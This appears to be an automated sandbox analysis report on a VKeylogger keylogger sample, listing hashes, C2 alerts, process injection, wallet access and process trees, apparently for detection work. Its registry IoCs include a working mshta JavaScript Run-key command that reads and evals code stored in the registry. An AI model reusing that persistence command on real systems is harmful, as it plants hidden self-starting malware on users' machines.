Analysis
-
max time kernel
161s
-
max time network
163s
-
platform
windows10-2004_x64
-
resource
win10v2004-en-20220112
-
submitted
21-02-2022 11:04
Static task
static1
Behavioral task
behavioral1
Sample
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
Resource
win10v2004-en-20220112
General
-
Target
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
-
Size
74KB
-
MD5
ba4380237e7a0f220deaaada1fddff73
-
SHA1
394b852855574cffa26a66bec083792a21f87f79
-
SHA256
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965
-
SHA512
5e70426b3547020f93c62764f418ff7d475f4bf772130b056f33884e7b155b9675a4af292b356bd9897c5e6c665488989d7400dfb452d8544d1252b3e3798142
Malware Config
Signatures
-
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/720-130-0x0000000002F20000-0x0000000002F32000-memory.dmp | family_vkeylogger
-
suricata: ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative)
-
suricata: ET MALWARE Generic Request to gate.php Dotted-Quad
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
415.exe
pid | process
3416 | 415.exe
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorer.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\grerg = "C:\\Users\\Admin\\AppData\\Local\\Temp\\57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe" | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yrty = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);" | explorer.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe, 415.exe
description | pid | process | target process
PID 3576 set thread context of 720 | 3576 | 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe | explorer.exe
PID 3416 set thread context of 2668 | 3416 | 415.exe | ielowutil.exe
-
Drops file in Windows directory 3 IoCs
Processes:
TiWorker.exe, svchost.exe
description | ioc | process
File opened for modification | C:\Windows\Logs\CBS\CBS.log | TiWorker.exe
File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat | svchost.exe
File opened for modification | C:\Windows\WinSxS\pending.xml | TiWorker.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MusNotifyIcon.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | MusNotifyIcon.exe
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MusNotifyIcon.exe
-
Modifies data under HKEY_USERS 50 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
ielowutil.exe
pid | process
2668 | ielowutil.exe
2668 | ielowutil.exe
-
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe, explorer.exe
pid | process
3576 | 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
720 | explorer.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
explorer.exe
pid | process
720 | explorer.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
explorer.exe, 415.exe
pid | process
720 | explorer.exe
3416 | 415.exe
-
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe, explorer.exe, 415.exe
description | pid | process | target process (repeated rows collapsed)
PID 3576 wrote to memory of 720 | 3576 | 57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe | explorer.exe
PID 720 wrote to memory of 3416 | 720 | explorer.exe | 415.exe
PID 3416 wrote to memory of 3632 | 3416 | 415.exe | ielowutil.exe
PID 3416 wrote to memory of 2668 | 3416 | 415.exe | ielowutil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe
"C:\Users\Admin\AppData\Local\Temp\57df82d0e4547407bdca25692313c2a95b07438991c4cfd44a85d85e5976a965.exe"
Process tree level 1
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
Process tree level 2
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\415.exe
"C:\Users\Admin\AppData\Local\Temp\415.exe"
Process tree level 3
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe"
Process tree level 4
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe"
Process tree level 4
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
Process tree level 1
- Checks processor information in registry
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
Process tree level 1
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
Process tree level 1
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\415.exe
MD5
558063e08ac6993410949408a509a30f
SHA1
d72106f1ed83cf83cde7f0ac3e89990521af7e76
SHA256
5c99e168d451cb5bc262de0e0251717578a637edb9cf16ba11e2315e86ad48f5
SHA512
e6ad56895b4e489fe079d7fa21951476a50077856a0f3f28678fdc2904306af389416370dd5cd4d911f21d2750c184bd8f1f40553cd4e3a7eee262ed86b7ae14
-
memory/720-130-0x0000000002F20000-0x0000000002F32000-memory.dmp
Filesize
72KB
-
memory/2668-135-0x0000000000400000-0x0000000000687000-memory.dmp
Filesize
2.5MB
-
memory/2668-136-0x0000000000400000-0x0000000000687000-memory.dmp
Filesize
2.5MB